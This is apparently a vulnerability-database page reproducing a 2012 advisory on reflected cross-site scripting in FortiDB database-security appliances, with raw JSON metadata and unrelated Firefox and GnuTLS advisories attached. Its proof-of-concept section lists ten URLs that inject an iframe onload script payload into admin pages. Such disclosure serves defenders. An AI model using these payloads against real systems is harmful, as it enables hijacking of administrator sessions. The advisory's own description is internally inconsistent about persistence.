Search...

FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting

2012-10-31T00:00:00

ID 1337DAY-ID-19873
Type zdt
Reporter n/a
Modified 2012-10-31T00:00:00

Description

FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.

                                        
                                            FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability

Introduction:
=============
Targeting large enterprises the FortiDB-2000B appliance provides scalable database security and 
compliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and 
easy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), 
IT audit, and regulatory compliance.

Designed for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database 
security and compliance solution. Through its web-based interface, the FortiDB-1000C centrally 
monitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent 
database security policies across the organization without imposing high management burdens on your 
database admin and IT staff. 

The FortiDB-400B appliance provides a cost effective database security and compliance solution for 
small to mid-size enterprises in a quick to implement, easy to manage package. It scans databases 
for vulnerabilities, monitors, and audits databases activities, and generates compliance reports. 
Its intuitive web-based interface ensures ease of configuration, minimizing the management burden 
on your database administrators and IT staff.

(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )


Cross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC & 400B.

Affected Products:
==================
Fortigate
Product: FortiDB  - Database Security Appliance v2000B; 1000C & 400B

Details:
========
A non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C & 400B. 
The vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). 
The vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. 
The bug is on application side & the execution is non-persistent out of the object exception-handling web application 
appliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can 
lead to session hijacking (manager/admin) or stable (persistent) context manipulation. 

Vulnerable Module(s):
        [+] Java Number Format Exception Handling

Affected Function(s):
        [+] (Output) Listing


Proof of Concept:
=================
The vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...

Review:  Java Number Format Exception-Handling - Listing [Output] Error

&lt;pre class="errorExceptionCause"&gt;java.lang.NumberFormatException: 
For input string: ""&gt;&lt;[NON PERSISTENT SCRIPT CODE!]")' &lt;"="" at="" java.lang.numberformatexception.
forinputstring(numberformatexception.java:48)="" java.lang.long.parselong(long.java:410)="" 
org.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)="" 
org.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)="" 
org.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)="" 
org.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.&lt;init=""&gt;
(OrchestraFacesContextFactory.java:119)
at  ...


PoC:
http://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
http://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C


Solution:
=========
The vulnerability can be prevented by parsing the java number format exception output listing & mkey application value.

2012-10-24:  Vendor Fix/Patch


Risk:
=====
The security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).

#  0day.today [2018-01-10]  #

JSON Vulners Source

Initial Source

{"published": "2012-10-31T00:00:00", "id": "1337DAY-ID-19873", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T01:33:39", "bulletin": {"published": "2012-10-31T00:00:00", "id": "1337DAY-ID-19873", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 4.1, "modified": "2016-04-20T01:33:39"}}, "hash": "fa0620e0d35f3d1603f85c3c1d14bde6c581e7f292e122c74c6b4252b47660da", "description": "FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.", "type": "zdt", "lastseen": "2016-04-20T01:33:39", "edition": 1, "title": "FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting", "href": "http://0day.today/exploit/description/19873", "modified": "2012-10-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 1, "cvelist": [], "sourceHref": "http://0day.today/exploit/19873", "references": [], "reporter": "n/a", "sourceData": "FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability\r\n\r\nIntroduction:\r\n=============\r\nTargeting large enterprises the FortiDB-2000B appliance provides scalable database security and \r\ncompliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and \r\neasy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), \r\nIT audit, and regulatory compliance.\r\n\r\nDesigned for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database \r\nsecurity and compliance solution. Through its web-based interface, the FortiDB-1000C centrally \r\nmonitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent \r\ndatabase security policies across the organization without imposing high management burdens on your \r\ndatabase admin and IT staff. \r\n\r\nThe FortiDB-400B appliance provides a cost effective database security and compliance solution for \r\nsmall to mid-size enterprises in a quick to implement, easy to manage package. It scans databases \r\nfor vulnerabilities, monitors, and audits databases activities, and generates compliance reports. \r\nIts intuitive web-based interface ensures ease of configuration, minimizing the management burden \r\non your database administrators and IT staff.\r\n\r\n(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )\r\n\r\n\r\nCross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC & 400B.\r\n\r\nAffected Products:\r\n==================\r\nFortigate\r\nProduct: FortiDB - Database Security Appliance v2000B; 1000C & 400B\r\n\r\nDetails:\r\n========\r\nA non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C & 400B. \r\nThe vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). \r\nThe vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. \r\nThe bug is on application side & the execution is non-persistent out of the object exception-handling web application \r\nappliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can \r\nlead to session hijacking (manager/admin) or stable (persistent) context manipulation. \r\n\r\nVulnerable Module(s):\r\n [+] Java Number Format Exception Handling\r\n\r\nAffected Function(s):\r\n [+] (Output) Listing\r\n\r\n\r\nProof of Concept:\r\n=================\r\nThe vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...\r\n\r\nReview: Java Number Format Exception-Handling - Listing [Output] Error\r\n\r\n<pre class=\"errorExceptionCause\">java.lang.NumberFormatException: \r\nFor input string: \"\"><[NON PERSISTENT SCRIPT CODE!]\")' <\"=\"\" at=\"\" java.lang.numberformatexception.\r\nforinputstring(numberformatexception.java:48)=\"\" java.lang.long.parselong(long.java:410)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.<init=\"\">\r\n(OrchestraFacesContextFactory.java:119)\r\nat ...\r\n\r\n\r\nPoC:\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\n\r\n\r\nSolution:\r\n=========\r\nThe vulnerability can be prevented by parsing the java number format exception output listing & mkey application value.\r\n\r\n2012-10-24: Vendor Fix/Patch\r\n\r\n\r\nRisk:\r\n=====\r\nThe security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "274b68192b056e268f128ff63bfcd4a4", "key": "reporter"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "modified"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "published"}, {"hash": "db9ad6f05877c09efa37eef3151bbf74", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "067d9a320946edc5b1aef4eb4e893ac2", "key": "href"}, {"hash": "77c9bc521da88a256a4504f504bdc8c8", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b3eb90685a8b4fca6b1a5be6f18c1d25", "key": "title"}, {"hash": "b421e3db642ea72f118665a58eb2b822", "key": "description"}], "objectVersion": "1.0"}}], "description": "FortiGate FortiDB 2kB 1kC and 400B suffer from a cross site scripting vulnerability.", "hash": "76e66b63e58132267edc98d59d36ff61c63e0b8dec44ea1c5efd56d23d0a85e7", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2018-01-10T17:34:22"}, "vulnersScore": 4.3}, "type": "zdt", "lastseen": "2018-01-10T17:34:22", "edition": 2, "title": "FortiGate FortiDB 2kB 1kC / 400B Cross Site Scripting", "href": "https://0day.today/exploit/description/19873", "modified": "2012-10-31T00:00:00", "bulletinFamily": "exploit", "viewCount": 5, "cvelist": [], "sourceHref": "https://0day.today/exploit/19873", "references": [], "reporter": "n/a", "sourceData": "FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability\r\n\r\nIntroduction:\r\n=============\r\nTargeting large enterprises the FortiDB-2000B appliance provides scalable database security and \r\ncompliance solution. Utilizing its flexible policy framework, the FortiDB-2000B allows quick and \r\neasy implementation of internal IT control frameworks for database activity monitoring (DAM/DAA), \r\nIT audit, and regulatory compliance.\r\n\r\nDesigned for mid-sized enterprises, the FortiDB-1000C appliance provides a comprehensive database \r\nsecurity and compliance solution. Through its web-based interface, the FortiDB-1000C centrally \r\nmonitors, audits and scans multiple distributed, heterogeneous databases. This ensures consistent \r\ndatabase security policies across the organization without imposing high management burdens on your \r\ndatabase admin and IT staff. \r\n\r\nThe FortiDB-400B appliance provides a cost effective database security and compliance solution for \r\nsmall to mid-size enterprises in a quick to implement, easy to manage package. It scans databases \r\nfor vulnerabilities, monitors, and audits databases activities, and generates compliance reports. \r\nIts intuitive web-based interface ensures ease of configuration, minimizing the management burden \r\non your database administrators and IT staff.\r\n\r\n(Copy of the Vendor Homepage: http://www.fortinet.com/products/fortidb )\r\n\r\n\r\nCross Site Scripting Vulnerability in FortiGates FortiDB 2kB 1kC & 400B.\r\n\r\nAffected Products:\r\n==================\r\nFortigate\r\nProduct: FortiDB - Database Security Appliance v2000B; 1000C & 400B\r\n\r\nDetails:\r\n========\r\nA non-persistent input validation vulnerability is detected in FortiGates FortiDB Appliance 2000B 1000C & 400B. \r\nThe vulnerability allows remote attackers to implement/inject malicious script code on the application side (persistent). \r\nThe vulnerability is located in the Java Number Format Exception Handling module with the bound vulnerable output listing. \r\nThe bug is on application side & the execution is non-persistent out of the object exception-handling web application \r\nappliance context. Exploitation requires low or medium user inter action. Successful exploitation of the vulnerability can \r\nlead to session hijacking (manager/admin) or stable (persistent) context manipulation. \r\n\r\nVulnerable Module(s):\r\n [+] Java Number Format Exception Handling\r\n\r\nAffected Function(s):\r\n [+] (Output) Listing\r\n\r\n\r\nProof of Concept:\r\n=================\r\nThe vulnerability can be exploited by remote attacker with medium or high required user inter action. For demonstration or reproduce ...\r\n\r\nReview: Java Number Format Exception-Handling - Listing [Output] Error\r\n\r\n<pre class=\"errorExceptionCause\">java.lang.NumberFormatException: \r\nFor input string: \"\"><[NON PERSISTENT SCRIPT CODE!]\")' <\"=\"\" at=\"\" java.lang.numberformatexception.\r\nforinputstring(numberformatexception.java:48)=\"\" java.lang.long.parselong(long.java:410)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.findconversationcontextid(conversationmanager.java:157)=\"\" \r\norg.apache.myfaces.orchestra.conversation.conversationmanager.getcurrentrootconversationcontext(conversationmanager.java:564)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.contextlockrequesthandler.init(contextlockrequesthandler.java:87)=\"\" \r\norg.apache.myfaces.orchestra.lib.jsf.orchestrafacescontextfactory$1.<init=\"\">\r\n(OrchestraFacesContextFactory.java:119)\r\nat ...\r\n\r\n\r\nPoC:\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/admin/auditTrail.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/targetsMonitorView.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/globalsummary.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vaerrorlog/vaErrorLog.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/database/listTargetGroups.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/sysconfig/listSystemInfo.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/vascan/list.jsf?conversationContext=1%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/network/router.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/editPolicyProfile.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\nhttp://utm-waf.127.0.0.1:1339/fortidb/mapolicymgmt/maPolicyMasterList.jsf?conversationContext=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C\r\n\r\n\r\nSolution:\r\n=========\r\nThe vulnerability can be prevented by parsing the java number format exception output listing & mkey application value.\r\n\r\n2012-10-24: Vendor Fix/Patch\r\n\r\n\r\nRisk:\r\n=====\r\nThe security risk of the non-persistent cross site scripting vulnerability is estimated as medium(-).\n\n# 0day.today [2018-01-10] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b421e3db642ea72f118665a58eb2b822", "key": "description"}, {"hash": "ac586e71d37d1163000b1abb48b6ad56", "key": "href"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "modified"}, {"hash": "3a3885fa4599a1689e815d78994cdd57", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "274b68192b056e268f128ff63bfcd4a4", "key": "reporter"}, {"hash": "e1fbfe6b219703dfccf15ee442ebb46c", "key": "sourceData"}, {"hash": "b9847cf20b1bd67b5914cfa768cc690f", "key": "sourceHref"}, {"hash": "b3eb90685a8b4fca6b1a5be6f18c1d25", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}

{"securityvulns": [{"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "description": "Frevulnerabilities on TLS traffic parsing lead to DoS conditions and potential buffer overflow.", "modified": "2008-05-20T00:00:00", "published": "2008-05-20T00:00:00", "id": "SECURITYVULNS:VULN:9010", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:9010", "title": "GnuTLS library multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nHardcore Disassembler / Reverse Engineer Wanted!\r\n\r\nWant to work with IDA and BinDiff?\r\nWant to write PoC's and Exploits?\r\n\r\nYour nationality is not important.\r\nWe will get you a work permit, find an apartment, and offer a\r\nrelocation compensation package.\r\n\r\nhttp://secunia.com/hardcore_disassembler_and_reverse_engineer/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nMozilla Firefox Multiple Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA19873\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/19873/\r\n\r\nCRITICAL:\r\nHighly critical\r\n\r\nIMPACT:\r\nCross Site Scripting, DoS, System access\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nMozilla Firefox 1.x\r\nhttp://secunia.com/product/4227/\r\nMozilla Firefox 0.x\r\nhttp://secunia.com/product/3256/\r\n\r\nDESCRIPTION:\r\nMultiple vulnerabilities have been reported in Mozilla Firefox, which\r\ncan be exploited by malicious people to conduct cross-site scripting\r\nattacks or compromise a user's system.\r\n\r\n1) An error within the handling of JavaScript references to frames\r\nand windows may in certain circumstances result in the reference not\r\nbeing properly cleared and allows execution of arbitrary code.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n2) An error within the handling of Java references to properties of\r\nthe window.navigator object allows execution of arbitrary code if a\r\nweb page replaces the navigator object before starting Java.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n3) A memory corruption error within the handling of simultaneously\r\nhappening XPCOM events results in the use of a deleted timer object\r\nand allows execution of arbitrary code.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n4) Insufficient access checks on standard DOM methods of the\r\ntop-level document object (e.g. "document.getElementById()") can be\r\nexploited by a malicious web site to execute arbitrary script code in\r\nthe context of another site.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n5) A race condition where JavaScript garbage collection deletes a\r\ntemporary variable still being used in the creation of a new Function\r\nobject may allow execution of arbitrary code.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n6) Various errors in the JavaScript engine during garbage collection\r\nwhere used pointers are deleted and integer overflows when handling\r\nlong strings e.g. passed to the "toSource()" methods of the Object,\r\nArray, and String objects may allow execution of arbitrary code.\r\n\r\n7) Named JavaScript functions have a parent object created using the\r\nstandard "Object()" constructor, which can be redefined by script.\r\nThis can be exploited to run script code with elevated privileges if\r\nthe "Object()" constructor returns a reference to a privileged\r\nobject.\r\n\r\n8) An error within the handling of PAC script can be exploited by a\r\nmalicious Proxy AutoConfig (PAC) server to execute script code with\r\nescalated privileges by setting the FindProxyForURL function to the\r\neval method on a privileged object that has leaked into the PAC\r\nsandbox.\r\n\r\n9) An error within the handling of scripts granted the\r\n"UniversalBrowserRead" privilege can be exploited to execute script\r\ncode with escalated privileges equivalent to "UniversalXPConnect".\r\n\r\n10) An error can be exploited to execute arbitary script code in\r\ncontext of another site by using the\r\n"XPCNativeWrapper(window).Function(...)" construct, which creates a\r\nfunction that appears to belong to another site.\r\n\r\nThe vulnerability only affects the 1.5 branch.\r\n\r\n11) A memory corruption error when calling\r\n"nsListControlFrame::FireMenuItemActiveEvent()", some potential\r\nstring class buffer overflows, a memory corruption error when\r\nanonymous box selectors are outside of UA stylesheets, references to\r\nremoved nodes, errors involving table row and column groups, and an\r\nerror in "crypto.generateCRMFRequest" callback may potentially be\r\nexploited to execute arbitrary code.\r\n\r\n12) An error within the handling of "chrome:" URI's can be exploited\r\nto reference remote files that can run scripts with full privileges.\r\n\r\nSOLUTION:\r\nUpdate to version 1.5.0.5.\r\nhttp://www.mozilla.com/firefox/\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n1) Thilo Girmann\r\n2) Discovered by an anonymous person and reported via ZDI.\r\n3) Carsten Eiram, Secunia Research.\r\n4) Thor Larholm\r\n5) H. D. Moore\r\n6) Igor Bukanov, shutdown, and Georgi Guninski.\r\n7) moz_bug_r_a4\r\n8) moz_bug_r_a4\r\n9) shutdown\r\n10) shutdown\r\n11) Mozilla Developers\r\n12) Benjamin Smedberg, Mozilla.\r\n\r\nORIGINAL ADVISORY:\r\nMozilla.org:\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-44.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-45.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-46.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-47.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-48.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-50.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-51.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-52.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-53.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-54.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-55.html\r\nhttp://www.mozilla.org/security/announce/2006/mfsa2006-56.html\r\n\r\nSecunia Research:\r\nhttp://secunia.com/secunia_research/2006-53/\r\n\r\nZDI:\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-06-025.html\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.", "modified": "2006-07-27T00:00:00", "published": "2006-07-27T00:00:00", "id": "SECURITYVULNS:DOC:13642", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13642", "title": "[SA19873] Mozilla Firefox Multiple Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}